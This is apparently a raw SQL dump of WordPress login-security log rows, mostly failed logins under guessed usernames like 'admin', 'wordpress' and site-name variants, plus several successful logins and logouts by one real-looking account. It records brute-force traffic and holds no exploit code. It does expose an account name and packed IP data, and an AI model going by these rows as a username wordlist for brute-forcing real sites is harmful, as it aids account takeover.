(8840, 31637, 1692901863.508435, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹@0»', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8841, 31638, 1692901876.555183, 1, 'loginFailInvalidUsername', 'lovely', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.˜Û}', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8842, 31639, 1692901883.767361, 1, 'loginFailInvalidUsername', 'lovely', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ½\rY', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8843, 31640, 1692901887.238227, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq5”c', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8844, 31641, 1692901897.204404, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿXæ0', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8815, 31613, 1692901748.085254, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŒÕÉ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8814, 31612, 1692901744.153869, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿWµ¬ˆ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8807, 31605, 1692901711.465171, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¡ÁÄ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8808, 31606, 1692901714.201371, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿªOÊê', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8809, 31607, 1692901717.630521, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿWêg', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8810, 31608, 1692901727.475460, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿe2n§', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8811, 31609, 1692901732.266710, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµà¾"', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8812, 31610, 1692901735.996745, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$DÜ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8813, 31611, 1692901740.787117, 1, 'loginFailInvalidUsername', 'lovely', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±	:', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8763, 31263, 1692518357.190576, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg¢K', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8764, 31267, 1692526535.693882, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿf»d', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8765, 31280, 1692536995.621460, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ''.Ê¢', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8766, 31281, 1692541505.540635, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ”\0P', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8792, 31590, 1692901620.628013, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈéø)', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8793, 31591, 1692901623.942608, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ^7öó', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8794, 31592, 1692901626.787598, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿfž}', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8795, 31593, 1692901637.873844, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾•º.', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8796, 31594, 1692901642.796937, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuÈO—', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8797, 31595, 1692901647.694837, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsOxþ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8798, 31596, 1692901657.641877, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿœÎAA', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8799, 31597, 1692901661.424531, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnŠ[s', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9043, 32365, 1694031215.091410, 1, 'loginFailInvalidUsername', 'password!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿoZªì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9044, 32366, 1694031220.259525, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅy6.', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9045, 32367, 1694031223.963093, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ô¢W', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8948, 32042, 1693618777.508421, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±¢£', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8949, 32043, 1693618781.911462, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ V†', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(10013, 45631, 1705940175.320307, 1, 'loginFailInvalidUsername', 'matakucing3', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ6&,', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10014, 45632, 1705940232.679219, 1, 'loginFailInvalidUsername', 'smngrs951', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥ãcp', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10015, 45633, 1705940232.848650, 1, 'loginFailInvalidUsername', 'smngrs955', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥ãcp', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10016, 45634, 1705940295.703260, 1, 'loginFailInvalidUsername', 'smngrs952', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQ{˜', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10017, 45635, 1705940352.820511, 1, 'loginFailInvalidUsername', 'smngrs953', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§c''R', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10028, 45930, 1706458532.668777, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¹Œ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36'),
(10029, 45931, 1706458794.790208, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¹Œ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36'),
(10039, 47087, 1706889294.357534, 1, 'loginFailInvalidUsername', 'greeceman', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ;ý8', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10047, 47096, 1707008449.688049, 1, 'loginFailInvalidUsername', 'yanz@123457', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿšà4', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10048, 47098, 1707008460.353529, 1, 'loginFailInvalidUsername', 'Adsystem', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ\\(Ò', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10049, 47099, 1707008460.366097, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ\\(Ò', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9998, 45594, 1705821969.723400, 1, 'loginFailInvalidUsername', 'handsome110110', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10050, 47100, 1707008488.572069, 1, 'loginFailInvalidUsername', 'wpadmins', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ2>8a', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10000, 45596, 1705821980.177265, 1, 'loginFailInvalidUsername', 'handsome110110', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(9999, 45595, 1705821970.023286, 1, 'loginFailInvalidUsername', 'crystal', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(9994, 45487, 1705528039.301663, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(9995, 45488, 1705528100.740968, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(9996, 45504, 1705597831.412098, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(9991, 45483, 1705515702.244745, 1, 'loginFailInvalidUsername', 'comparador-productos', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿK!', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9992, 45484, 1705515703.894881, 1, 'loginFailInvalidUsername', 'comparador-productos', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿK!', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9989, 45195, 1705410938.493191, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(9988, 45165, 1705317804.408082, 1, 'loginFailInvalidUsername', 'henning', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhõ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9986, 45142, 1705257318.089451, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(9990, 45196, 1705411570.887439, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(9987, 45143, 1705257565.155656, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(9983, 45008, 1705096338.850051, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9834, 42060, 1701357863.457934, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½Q', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9835, 42100, 1701362846.721313, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb0Ÿ', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),
(9836, 42127, 1701364569.200463, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9837, 42128, 1701365051.416752, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9838, 42169, 1701369623.512151, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ©4‹', 'Mozilla/5.0'),
(9839, 42170, 1701370088.607988, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9714, 41343, 1701201497.270871, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),
(9840, 42171, 1701370338.607713, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9716, 41345, 1701202909.685603, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦¶t', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9715, 41344, 1701201547.512566, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹ö', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9717, 41346, 1701202911.665609, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦¶t', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9718, 41347, 1701202913.874884, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦¶t', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9719, 41348, 1701203170.793511, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9720, 41351, 1701204377.105592, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹ö', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9721, 41352, 1701205845.631728, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),
(9722, 41353, 1701206195.526686, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¸c', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9723, 41359, 1701211290.913348, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ6n', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9724, 41360, 1701213017.883249, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9725, 41362, 1701213487.091568, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½\\', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9726, 41369, 1701213932.633783, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ!¨', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9727, 41371, 1701215997.073134, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),
(9728, 41372, 1701216422.753112, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9729, 41373, 1701218612.518391, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9730, 41377, 1701221529.412895, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9731, 41378, 1701223197.138523, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9732, 41379, 1701223716.310946, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9733, 41382, 1701226027.599281, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),
(9734, 41385, 1701226865.463452, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9735, 41392, 1701228503.358228, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½:', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),
(9736, 41393, 1701228961.612509, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9303, 33065, 1694685483.009015, 1, 'loginFailInvalidUsername', 'chloe18', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¦–J', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9298, 33060, 1694685427.840114, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ`	X÷', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9299, 33061, 1694685434.370728, 1, 'loginFailInvalidUsername', 'password1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿwRUÆ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9300, 33062, 1694685439.514633, 1, 'loginFailInvalidUsername', 'happythinking.com1!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg½ÉZ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9301, 33063, 1694685443.212579, 1, 'loginFailInvalidUsername', 'happythinking@verizon.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾åÐ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9302, 33064, 1694685452.195466, 1, 'loginFailInvalidUsername', 'admin123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*w”K', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9293, 33055, 1694685405.475502, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)\né', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9294, 33056, 1694685409.785299, 1, 'loginFailInvalidUsername', 'abceasyas1231', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ%î _', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9295, 33057, 1694685413.836583, 1, 'loginFailInvalidUsername', 'admin@happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«âRd', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9296, 33058, 1694685420.916151, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÎT…O', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9297, 33059, 1694685424.362889, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ} gÊ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9248, 33013, 1694685142.054155, 1, 'loginFailInvalidUsername', 'admin1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg™»È', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9246, 33011, 1694685132.151223, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgP˜', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
